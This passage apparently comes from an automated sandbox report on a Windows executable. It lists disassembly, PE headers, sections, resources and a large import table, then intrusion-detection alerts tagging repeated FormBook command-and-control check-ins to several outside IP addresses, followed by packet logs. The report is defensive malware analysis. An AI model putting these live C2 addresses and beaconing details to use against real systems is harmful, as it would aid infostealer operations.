                                                                                                        jmp 00007F6F1110460Eh
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        push ebp
                                                                                                        mov ebp, esp
                                                                                                        push edi
                                                                                                        push esi
                                                                                                        mov esi, dword ptr [ebp+0Ch]
                                                                                                        mov ecx, dword ptr [ebp+10h]
                                                                                                        mov edi, dword ptr [ebp+08h]
                                                                                                        mov eax, ecx
                                                                                                        mov edx, ecx
                                                                                                        add eax, esi
                                                                                                        cmp edi, esi
                                                                                                        jbe 00007F6F1110478Ah
                                                                                                        cmp edi, eax
                                                                                                        jc 00007F6F11104926h
                                                                                                        cmp ecx, 00000080h
                                                                                                        jc 00007F6F1110479Eh
                                                                                                        cmp dword ptr [004A9724h], 00000000h
                                                                                                        je 00007F6F11104795h
                                                                                                        push edi
                                                                                                        push esi
                                                                                                        and edi, 0Fh
                                                                                                        and esi, 0Fh
                                                                                                        cmp edi, esi
                                                                                                        pop esi
                                                                                                        pop edi
                                                                                                        jne 00007F6F11104787h
                                                                                                        jmp 00007F6F11104B62h
                                                                                                        test edi, 00000003h
                                                                                                        jne 00007F6F11104796h
                                                                                                        shr ecx, 02h
                                                                                                        and edx, 03h
                                                                                                        cmp ecx, 08h
                                                                                                        jc 00007F6F111047ABh
                                                                                                        rep movsd
                                                                                                        jmp dword ptr [00416740h+edx*4]
                                                                                                        mov eax, edi
                                                                                                        mov edx, 00000003h
                                                                                                        sub ecx, 04h
                                                                                                        jc 00007F6F1110478Eh
                                                                                                        and eax, 03h
                                                                                                        add ecx, eax
                                                                                                        jmp dword ptr [00416654h+eax*4]
                                                                                                        jmp dword ptr [00416750h+ecx*4]
                                                                                                        nop
                                                                                                        jmp dword ptr [004166D4h+ecx*4]
                                                                                                        nop
                                                                                                        inc cx
                                                                                                        add byte ptr [eax-4BFFBE9Ah], dl
                                                                                                        inc cx
                                                                                                        add byte ptr [ebx], ah
                                                                                                        ror dword ptr [edx-75F877FAh], 1
                                                                                                        inc esi
                                                                                                        add dword ptr [eax+468A0147h], ecx
                                                                                                        add al, cl
                                                                                                        jmp 00007F6F1357CF87h
                                                                                                        add esi, 03h
                                                                                                        add edi, 03h
                                                                                                        cmp ecx, 08h
                                                                                                        jc 00007F6F1110474Eh
                                                                                                        rep movsd
                                                                                                        jmp dword ptr [00000000h+edx*4]

                                                                                                        Rich Headers

                                                                                                        Programming Language:
                                                                                                        • [ C ] VS2010 SP1 build 40219
                                                                                                        • [C++] VS2010 SP1 build 40219
                                                                                                        • [ C ] VS2008 SP1 build 30729
                                                                                                        • [IMP] VS2008 SP1 build 30729
                                                                                                        • [ASM] VS2010 SP1 build 40219
                                                                                                        • [RES] VS2010 SP1 build 40219
                                                                                                        • [LNK] VS2010 SP1 build 40219

                                                                                                        Data Directories

                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9328.rsrc
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                        Sections

                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                        .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                        .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                        .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                        .rsrc0xab0000x93280x9400495451d7eb8326bd9fa2714869ea6de8False0.49002322635135137data5.541804843154628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                        Resources

                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                        RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                        RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                        RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                        RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                                                                                        RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                                                                                        RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                                                                                        RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                                                                                        RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                                                                                        RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                                                                                        RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                                                                                        RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                                                                                        RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                                                                                        RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                                                                                        RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                                                                                        RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                                                                                        RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                                                                                        RT_STRING0xb28380x4d0dataEnglishGreat Britain0.36363636363636365
                                                                                                        RT_STRING0xb2d080x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                        RT_STRING0xb33080x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                        RT_STRING0xb39680x388dataEnglishGreat Britain0.377212389380531
                                                                                                        RT_STRING0xb3cf00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                                                                        RT_GROUP_ICON0xb3e480x84dataEnglishGreat Britain0.6439393939393939
                                                                                                        RT_GROUP_ICON0xb3ed00x14dataEnglishGreat Britain1.15
                                                                                                        RT_GROUP_ICON0xb3ee80x14dataEnglishGreat Britain1.25
                                                                                                        RT_GROUP_ICON0xb3f000x14dataEnglishGreat Britain1.25
                                                                                                        RT_VERSION0xb3f180x19cdataEnglishGreat Britain0.5339805825242718
                                                                                                        RT_MANIFEST0xb40b80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581

                                                                                                        Imports

                                                                                                        DLLImport
                                                                                                        WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                                                        VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                                                        WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                        COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                                                        MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                                                        WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                                                        PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                                                        USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                                                        KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                                                                                                        USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                                                                                        GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                                                                                        COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                        ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                                                                                        SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                        ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                                                                                        OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit

                                                                                                        Possible Origin

                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                        EnglishGreat Britain
                                                                                                        EnglishUnited States

                                                                                                        Network Behavior

                                                                                                        Suricata IDS Alerts

                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                        2024-11-06T08:39:13.534070+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.649753TCP
                                                                                                        2024-11-06T08:39:43.494387+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649911154.92.61.3780TCP
                                                                                                        2024-11-06T08:39:43.494387+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649911154.92.61.3780TCP
                                                                                                        2024-11-06T08:39:51.605543+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.649957TCP
                                                                                                        2024-11-06T08:40:00.378127+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6499833.33.130.19080TCP
                                                                                                        2024-11-06T08:40:02.083678+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6499843.33.130.19080TCP
                                                                                                        2024-11-06T08:40:04.597512+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6499853.33.130.19080TCP
                                                                                                        2024-11-06T08:40:07.142021+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.6499863.33.130.19080TCP
                                                                                                        2024-11-06T08:40:07.142021+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6499863.33.130.19080TCP
                                                                                                        2024-11-06T08:40:13.021440+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649987203.161.49.19380TCP
                                                                                                        2024-11-06T08:40:15.547543+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649988203.161.49.19380TCP
                                                                                                        2024-11-06T08:40:18.109970+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649989203.161.49.19380TCP
                                                                                                        2024-11-06T08:40:20.672098+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649990203.161.49.19380TCP
                                                                                                        2024-11-06T08:40:20.672098+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649990203.161.49.19380TCP
                                                                                                        2024-11-06T08:40:26.374694+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6499913.33.130.19080TCP
                                                                                                        2024-11-06T08:40:28.933962+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6499933.33.130.19080TCP
                                                                                                        2024-11-06T08:40:31.782789+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6499943.33.130.19080TCP
                                                                                                        2024-11-06T08:40:34.357565+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.6499953.33.130.19080TCP
                                                                                                        2024-11-06T08:40:34.357565+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6499953.33.130.19080TCP
                                                                                                        2024-11-06T08:40:40.033394+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6499963.33.130.19080TCP
                                                                                                        2024-11-06T08:40:42.594794+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6499973.33.130.19080TCP
                                                                                                        2024-11-06T08:40:45.156854+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6499983.33.130.19080TCP
                                                                                                        2024-11-06T08:40:47.887323+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.6499993.33.130.19080TCP
                                                                                                        2024-11-06T08:40:47.887323+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6499993.33.130.19080TCP
                                                                                                        2024-11-06T08:40:53.673384+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650000198.252.98.5480TCP
                                                                                                        2024-11-06T08:40:56.299646+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650001198.252.98.5480TCP
                                                                                                        2024-11-06T08:40:59.697416+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650002198.252.98.5480TCP
                                                                                                        2024-11-06T08:41:01.413455+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650003198.252.98.5480TCP
                                                                                                        2024-11-06T08:41:01.413455+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650003198.252.98.5480TCP
                                                                                                        2024-11-06T08:41:07.459323+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650005103.224.182.24280TCP
                                                                                                        2024-11-06T08:41:10.004531+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650006103.224.182.24280TCP
                                                                                                        2024-11-06T08:41:12.550081+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650007103.224.182.24280TCP
                                                                                                        2024-11-06T08:41:15.086787+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650008103.224.182.24280TCP
                                                                                                        2024-11-06T08:41:15.086787+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650008103.224.182.24280TCP
                                                                                                        2024-11-06T08:41:21.763239+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650009154.23.184.21880TCP
                                                                                                        2024-11-06T08:41:24.322356+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650010154.23.184.21880TCP
                                                                                                        2024-11-06T08:41:26.871250+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650011154.23.184.21880TCP
                                                                                                        2024-11-06T08:41:29.435247+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650012154.23.184.21880TCP
                                                                                                        2024-11-06T08:41:29.435247+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650012154.23.184.21880TCP
                                                                                                        2024-11-06T08:41:35.712995+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65001331.31.196.1780TCP
                                                                                                        2024-11-06T08:41:38.228622+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65001431.31.196.1780TCP
                                                                                                        2024-11-06T08:41:40.806800+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65001531.31.196.1780TCP
                                                                                                        2024-11-06T08:41:43.525575+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.65001631.31.196.1780TCP
                                                                                                        2024-11-06T08:41:43.525575+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65001631.31.196.1780TCP
                                                                                                        2024-11-06T08:41:49.471369+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65001713.248.169.4880TCP
                                                                                                        2024-11-06T08:41:52.009629+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65001813.248.169.4880TCP
                                                                                                        2024-11-06T08:41:54.616427+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65001913.248.169.4880TCP
                                                                                                        2024-11-06T08:41:57.262565+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.65002013.248.169.4880TCP
                                                                                                        2024-11-06T08:41:57.262565+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65002013.248.169.4880TCP
                                                                                                        2024-11-06T08:42:03.545297+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650021217.76.156.25280TCP
                                                                                                        2024-11-06T08:42:06.056427+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650022217.76.156.25280TCP
                                                                                                        2024-11-06T08:42:08.558522+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650023217.76.156.25280TCP
                                                                                                        2024-11-06T08:42:11.112133+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650024217.76.156.25280TCP
                                                                                                        2024-11-06T08:42:11.112133+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650024217.76.156.25280TCP
                                                                                                        2024-11-06T08:42:17.393054+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650026161.97.142.14480TCP
                                                                                                        2024-11-06T08:42:19.926700+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650027161.97.142.14480TCP
                                                                                                        2024-11-06T08:42:22.488516+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650028161.97.142.14480TCP
                                                                                                        2024-11-06T08:42:25.010909+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650029161.97.142.14480TCP
                                                                                                        2024-11-06T08:42:25.010909+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650029161.97.142.14480TCP
                                                                                                        2024-11-06T08:42:30.853335+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650030199.59.243.22780TCP
                                                                                                        2024-11-06T08:42:33.416565+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650031199.59.243.22780TCP
                                                                                                        2024-11-06T08:42:35.970041+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650032199.59.243.22780TCP
                                                                                                        2024-11-06T08:42:38.520024+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650033199.59.243.22780TCP
                                                                                                        2024-11-06T08:42:38.520024+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650033199.59.243.22780TCP
                                                                                                        2024-11-06T08:42:44.567492+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650034188.114.97.380TCP
                                                                                                        2024-11-06T08:42:47.149297+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650035188.114.97.380TCP
                                                                                                        2024-11-06T08:42:49.751293+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650036188.114.97.380TCP
                                                                                                        2024-11-06T08:42:52.287067+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650037188.114.97.380TCP
                                                                                                        2024-11-06T08:42:52.287067+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650037188.114.97.380TCP
                                                                                                        2024-11-06T08:42:58.661949+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500383.33.130.19080TCP
                                                                                                        2024-11-06T08:43:01.193658+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500393.33.130.19080TCP

                                                                                                        Network Port Distribution

                                                                                                        TCP Packets

                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Nov 6, 2024 08:39:42.497097969 CET4991180192.168.2.6154.92.61.37
                                                                                                        Nov 6, 2024 08:39:42.502002954 CET8049911154.92.61.37192.168.2.6
                                                                                                        Nov 6, 2024 08:39:42.502095938 CET4991180192.168.2.6154.92.61.37
                                                                                                        Nov 6, 2024 08:39:42.510540962 CET4991180192.168.2.6154.92.61.37
                                                                                                        Nov 6, 2024 08:39:42.515414953 CET8049911154.92.61.37192.168.2.6
                                                                                                        Nov 6, 2024 08:39:43.444372892 CET8049911154.92.61.37192.168.2.6
                                                                                                        Nov 6, 2024 08:39:43.494386911 CET4991180192.168.2.6154.92.61.37
                                                                                                        Nov 6, 2024 08:39:43.623641968 CET8049911154.92.61.37192.168.2.6
